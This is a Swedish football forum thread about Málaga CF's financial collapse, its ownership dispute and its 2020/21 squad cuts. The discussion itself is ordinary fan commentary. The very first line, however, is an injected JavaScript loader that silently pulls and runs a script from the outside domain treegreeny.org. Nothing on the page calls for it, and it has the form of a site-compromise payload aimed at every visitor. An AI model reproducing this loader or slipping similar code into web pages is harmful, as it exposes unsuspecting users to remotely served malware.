;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Málaga CF 2020/2021 – Arkiverat – FMSweden Forum
Meny Stäng

Málaga CF 2020/2021
 
Share:
Notifications
Clear all

Málaga CF 2020/2021

13 Inlägg
6 Users
18 Reactions
1,135 Visningar
trashbag
(@trashbag)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 193
Topic starter  

Málaga CF - En historia

* Al-Thani från Qatar köper Málaga som dras med stora skulder i juni 2010. Notera att klubben fick rekonstrueras under 90-talet så det var inte längesedan man "fick börja om" i ligasystemet.

* Någon gång efter övertagandet snackar Al-Thani med högt uppsatta inom BlueBay (hotellkedja) om att dom ska få köpa 49% av klubben (Al-Thani ska ha 51%) för en billig slant eftersom Málaga är skulddrabbat behöver han hjälp.

* Man värvar ganska kassa (Rondón och Eliseu är väl undantagen) spelare för 30 miljoner Euro och slutar bara 11 i La Liga 2010/2011.

* Man spänner musklerna ordentligt inför säsong 2011/2012 och värvar för 65-70 miljoner Euro. Bland annat Cazorla, Isco, Monreal, Toulalan, Joaquín, van Nistelrooy, Caballero, Camacho, Baptista, Demichelis. Man slutar 4 i La Liga.

* Någonstans här brister det. Ägaren som vill bygga ut/ny arena, hotell i södra Spanien för att göra det till en helhetsupplevels osv får inte bygglov. Kallar spanjorerna för rasister med mera. Vet inte exakt tidpunkten/vilket år men någonstans här så görs ägandeskapet om och Al-Thani säger att han äger 100% men då kommer BlueBay och säger att dom äger 49%. Al-Thani säger att det aldrig fanns något avtal med BlueBay men dom säger att det visst finns och att dom lagt in pengar i klubben för att täcka skulder.

* Málaga värvar/lånar gratis inför säsong 2012/2013 och släpper bla Cazorla, Rondón, Monreal mfl inför/under säsongen för ca 30 miljoner Euro. Det är kaos i klubben. Al-Thani varvar positiva kommentarer med att vara galen på sociala media. Klubben redovisar inte sin ekonomi ordentligt trots upprepade varningar och det beslutas i slutet av säsongen att man blir avstängda från kommande års Europaspel (vet inte om det var ett eller två år). Trots detta är man bara minuter från CL-semifinal (två mål insläppta sista fem mot Dortmund...) och man kommer 6.a i ligan.

* Ekonomin åt helvete. Man är avstängda från Europa League. Man värvar in hyfsade spelare men tappar spelare som Baptista, Saviola, Demichelis, Toulalan, Isco, Joaquín. 40 miljoner Euro in. Man kommer ändå 11.a i ligan 2013/2014.

* Inför 2014/2015 ändrar ägaren sig flera flera gånger under sommaren om han ska sälja klubben eller inte, han blir kvar. Inför/under säsongen tappar man bla Caballero, Antunes, Gámez, Eliseu. 20 miljoner Euro plus på transfers. Man kommer 9.a i La Liga.

* Efter säsongen 2014/2015 får man bud från några kineser som kan tänka sig att betala 30 miljoner Euro till ägaren, ta över alla skulder, satsa mer på akademien, bygga ut arenan från 30000 till 45000, ge klubben 10 miljoner Euro i transferpengar och rent generellt låta klubben "växa inifrån". Ägaren tackar nej en gång - fans blir frustrerade. Det sägs att flera olika ägargrupper är intresserade av Málaga. Ägaren tackar nej. Det visar sig att Málaga är under domstolsgranskning och ägarskapet därför inte kan ändras. Detta för att BlueBay hävdar att dom äger 49% av Málaga medan ägaren skriver på sociala medier att dom inte gör det. Så tills domstolsbeslut tas kan inte ägarskapet i klubben inte ändras.

* Málaga hade skulder att betala av inför 2015/2016. 15-20 miljoner Euro skulle in innan juni var slut. Slutar med att man säljer Darder, Amrabat, Samu García, Samu Castillejo, Juanmi samt lite annat. Värvar väldigt billigt så man går lite drygt 35 miljoner Euro plus så man kan betala av skulden. Man slutar 8.a i La Liga.

* Från 2015/2016 och framåt har det pågått i samma stil som innan. Visserligen går man minus 12,5 miljoner Euro i minus i transfernetto 16/17 men 17/18 är det 25 miljoner Euro plus. 18/19 är det 10 miljoner Euro plus. Den gångna säsongen nästan 20 miljoner Euro plus. 2016/2017 11.a i La Liga. 2017/2018 20.e och sist och nedflyttning från La Liga. 2018/2019 3.a i Segundan men förlust i play-off semi mot Deportivo.

* Det är inte så att Málaga gör det "smart" på marknaden utan det är helt enkelt så att man måste sälja allt av värde för att inte gå i konkurs och samtidigt försöka vara kvar i Spaniens elitfotboll. Inför säsongen införde ligan ett lönetak för Málaga för att strama åt den blödande ekonomin. Något som slutade i att en sån spelare som Okazaki togs in gratis men sedan inte fick registreras i truppen som ny spelare då man inte kunde hamna under ligans lönebudget då. På den nivån är det...

* Så någonstans läcker alla dessa nettovinster från övergångsfönstrena ut. Ordföranden Al-Thani svingade som vanligt inför denna säsong 19/20 att någon förskingrar pengar och den ska bort men alla supportrar misstänker ju att det är han själv som i mångt och mycket är källan...Det något positiva är att rättsprocesser äntligen hölls under 19/20 och att ägaren Al-Thani då blev avstängd sex månader från klubben och måste betala 7 miljoner Euro för att få tillbaka sina andelar. Så fram till nu är det en advokat som sett över all administration av klubben. Jag har ännu inte uppdaterat mig om hur det ser ut för Al-Thani just i detta nu men ska läsa in mig på frågan innan ligan drar igång igen.

* Hur det slutar när man avvecklar en klubb sakta men säkert? Jo dryga 10 år efter att Málaga fått en "rik" ägare klarar man sig kvar i Segundan, alltså andradivisionen, med blott två poäng. Det finns knappt någon spelare kvar att sälja längre för det finns helt enkelt inga intressenter för ett gäng halvtaskiga andradivsionsspelare. Hitills har man tagit in en avdankad 32-åring på fri transfer. Samt lånat in en rotationsspelare från Extremadura (som åkte ur andradivsionen). På den nivån är det när Málaga "stärker" upp inför nästa säsong i Segundan.

* Det gäller att klubben håller sig kvar i Segundan, sanerar skulderna och hittar en ny ägare för att denna båt inte ska sjunka...

Ber om ursäkt för kunskapsluckor samt "snabbspolningen" gällande senaste fem säsongerna. Men får ibland frågan angående hur Málaga kan vara där nere där dom är och eftersom jag hade skrivit första hälften av texten för några år sedan så tänkte jag att jag kunde starta årets hetaste lagtråd med nyttig bakgrundshistoria.


   
Argt Troll, Daniel Nilsson, vicke231 and 2 people reacted
Citera
Q
 Q
(@q)
Estimable Member
Blev medlem: 4 år sedan
Inlägg: 134
 

Tack för texten.
Känns som det finns utrymme för en Niva-text här, eller det kanske redan gjorts en?

Det du skriver visar verkligen baksidan med den så kallade moderna fotbollen. Fifan. När publik blir tillåtet igen får man se till att ta en weekend i Spanien och knuffa in några biljettpengar till Al-Thani.

VI HAR ALLTID DRÖMT OM ATT SPELA I BLÅRANDIGT - SPELA SOM I VÅRA DRÖMMAR!


   
SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
 

Det är helt sjukt hur ägare får behandla klubbar. Detta är varken den första eller sista klubben som hamnar i fel händer men eftersom jag har en mindre kärlek till klubben så känns det extra tungt. Otroligt intressant med insikten du ger i din text, tack för det!


   
SvaraCitera
(@denkan)
New Member
Blev medlem: 4 år sedan
Inlägg: 4
 

Är Málaga nya Portsmouth?

This post was modified 4 år sedan by Denkan

   
SvaraCitera
trashbag
(@trashbag)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 193
Topic starter  
Postad av: @denkan

Är Málaga nya Portsmouth?

Du får gärna utveckla vad du menar med detta. Det enda jag känner till om Portsmouth är att dom också haft ekonomiska problem och åkt ur lite serier i ligasystemet. Men Málaga har som sagt dragits med dålig ekonomi sen 90-talet så vet inte om Portsmouth också har en sådan lång historik med dåligt om pengar?

 


   
SvaraCitera
trashbag
(@trashbag)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 193
Topic starter  

Officiell kommuniké från klubben: https://www.malagacf.com/en/news/malaga-cf-statement-12

Málaga kommer behöva strukturera om sin A-trupp. Redan i Maj ( https://www.malagacf.com/en/news/malaga-cf-statement-9 ) rapporterades att man skulle säga upp kontrakten med ledarna och spelarna och nu ser denna process ut att på riktigt ta fart. Om jag förstått det rätt så kommer man säga upp ledarnas och spelarnas kontrakt för att i nästa steg kanske ändå lyckas behålla en del av dessa(?) Hursomhelst påbörjas detta på riktigt nu så det blir spännande att se vad för trupp Málaga kommer ställa upp med när säsongen 20/21 drar igång.


   
Micke reacted
SvaraCitera
trashbag
(@trashbag)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 193
Topic starter  

Enligt Petter Veland (känd nordisk expert på spansk fotboll) så är det i princip redan klart att halva A-truppen (startelvan) är på g ut:

"Diario Sur skriver at både Munir Mohand, Cifu, Luis Hernández, David Lombán, Juan Carlos, Adrián González, Juanpi Añor, Renato Santos, Esteban Rolón og Dani Pacheco har fått beskjed om at kontraktene termineres, mens Keidi Bare og Diego González selges til andre klubber straks."

Betalvägg blockar mig från att läsa mer om detta på Diario Sur men det är ju lokaltidningen som gäller runt Málaga CF så man får förutsätta att dom har koll.

Så det blir nog att förlita sig på stommen från B-laget som slutade på en mittenplacering i terceran (fjärde nivån) samt lån/fri transfers med låga lönekrav men med löfte om speltid. Man var nära att åka ur segundan denna säsong 19/20 och man lär väl vara ännu närmre den säsongen som kommer om man ser till vilken trupp Málaga realistiskt kan få ihop.


   
SvaraCitera
(@kristijan)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 31
 

Det låter som Málaga kommer få det tufft nästa säsong och en bra tid framöver. Tråkigt att se att en klubb som var ett bra La-Liga lag falla så hårt.


   
SvaraCitera
trashbag
(@trashbag)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 193
Topic starter  
Postad av: @kristijan

Det låter som Málaga kommer få det tufft nästa säsong och en bra tid framöver. Tråkigt att se att en klubb som var ett bra La-Liga lag falla så hårt.

Ja dom gör ju denna åtgärd som sista utväg för att undvika att bli nedflyttade till segunda b på grund av administration (skulder utan rimlig avbetalningsplan). Det paradoxala är ju dock att den otroliga försvagningen av truppen kan göra att man just åker ner till segunda b. Men som supporter får man ändå ge dom att dom gör det dom kan just nu. Man klarade kontraktet i ligan, man gör sig av med den dyra halvan av A-truppen och kommer sen försöka samla sig för att klara kontraktet på nytt. Finns inget annat att göra.

 


   
SvaraCitera
trashbag
(@trashbag)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 193
Topic starter  

Málaga verkar ha en tydlig strategi där man kollar vad man kan hämta från dom fyra lagen som åkte ur (Deportivo, Extremadura, Numancia, Racing Santander). Förutom en portugis som man hämtat utifrån har man hitills lånat in en spelare från Extremadura samt värvat tre spelare på fri transfer från Numancia. Varje lag som åkt ur har släppt fem spelare eller fler och har man lyckats behålla någon av sina bästa spelare i truppen finns det stor chans att dom lånas ut. Málaga är ju dock inte själva om att försöka få tag på dessa spelare utan slåss väl framförallt med andra klubbar som hamnade på nedre halvan av Segundan om dessa. En billig och fullt förståelig strategi i dessa tider. På utsidan har det inte hänt mycket än med alla kontrakt som ska avslutas. I princip alla spelare är kvar i klubben fortfarande sedan nyheten som kom för en vecka sedan. Förmodligen tar ju dock sånt här lite tid när man måste avsluta så många kontrakt samtidigt.


   
SvaraCitera
Q
 Q
(@q)
Estimable Member
Blev medlem: 4 år sedan
Inlägg: 134
 

Låter som du pratat med ledningen angående strategin att fynda i nedflyttade lag.

VI HAR ALLTID DRÖMT OM ATT SPELA I BLÅRANDIGT - SPELA SOM I VÅRA DRÖMMAR!


   
trashbag reacted
SvaraCitera
trashbag
(@trashbag)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 193
Topic starter  

Kapar "min egen tråd" och meddelar för intresserade att jag på prov under närmaste kvartalet kommer twittra om Segundan i Spanien. Alltså inte bara Málaga. Länk till kontot


   
Micke and Q reacted
SvaraCitera
(@sweem)
New Member
Blev medlem: 4 år sedan
Inlägg: 2
 

Trots stor spelaromsättning och ganska tunga tapp, har ju säsongsstarten varit överraskande bra


   
SvaraCitera
Share: